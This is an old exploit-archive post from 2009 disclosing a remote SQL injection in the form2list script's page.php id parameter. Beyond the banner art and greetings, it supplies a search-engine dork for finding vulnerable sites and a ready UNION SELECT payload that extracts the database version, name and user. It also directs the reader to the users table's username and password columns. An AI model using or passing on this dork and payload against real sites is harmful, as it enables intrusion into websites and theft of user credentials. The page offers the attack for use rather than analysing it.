[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : form2list (page.php id) Remote SQL Injection Vulnerability
# Published : 2009-04-03
# Author : Cyber-Zone
# Previous Title : glFusion <= 1.1.2 COM_applyFilter()/cookies Blind SQL Injection Exploit
# Next Title : Family Connections <= 1.8.2 Remote Shell Upload Exploit
*********************************************************************************************
[!] [!]
[!] OOOO O OOOOOOOOO [!]
[!]O O O O O [!]
[!]O O O [!]
[!]O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
[!]O OOO OOO O O O O OO O O O O OO O O O [!]
[!]O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
[!]O O OOOO O O O O O O O O O O O [!]
[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
[!] OO [!]
[!] OO [!]
[!] OO Proud To Be MoroCCaN [!]
[!] OO [!]
*********************************************************************************************
BadBoy From : Institut Priv?? Des Enseignement TeChnique Et Informatique "IPETI"
---------------------------------------------------------------------------------------------
= form2list (page.php) (id) Remote SQL injection Vulnerability =
---------------------------------------------------------------------------------------------
SeCuriTy Is NoNe
---------------------------------------------------------------------------------------------
-===========================================================================================-
-= SQL InjEction By : Cyber-Zone =-
-= =-
-= E-mail : paradis_des_fous@hotmail.fr =-
-= =-
-= Home : WwW.sql-w0rm.Org =-
-===========================================================================================-
---------------------------------------------------------------------------------------------
-
- Script home : www.form2list.com
-
-
- Dork : Powered By form2list
-
-
- Exploit : [Target]/page.php?id=[SQL]
-
- : [Target]/page.php?id=-1+union+select+concat_ws(0x3a3a,version(),database(),user()),2,3,4,5,6,7,8--
-
-
- you can see all informations in source page
-
- users::username
- users::password
-
-
---------------------------------------------------------------------------------------------
-======================================= ThanX To ==========================================-
-= Hussin X , CraCkEr , Sakab , xXx =-
-= =-
-= TrYaG , WwW.No-ExploiT.Com =-
-= =-
-= AnA MaGhribi Den MouK =-
-===========================================================================================-
# www.Syue.com [2009-04-03]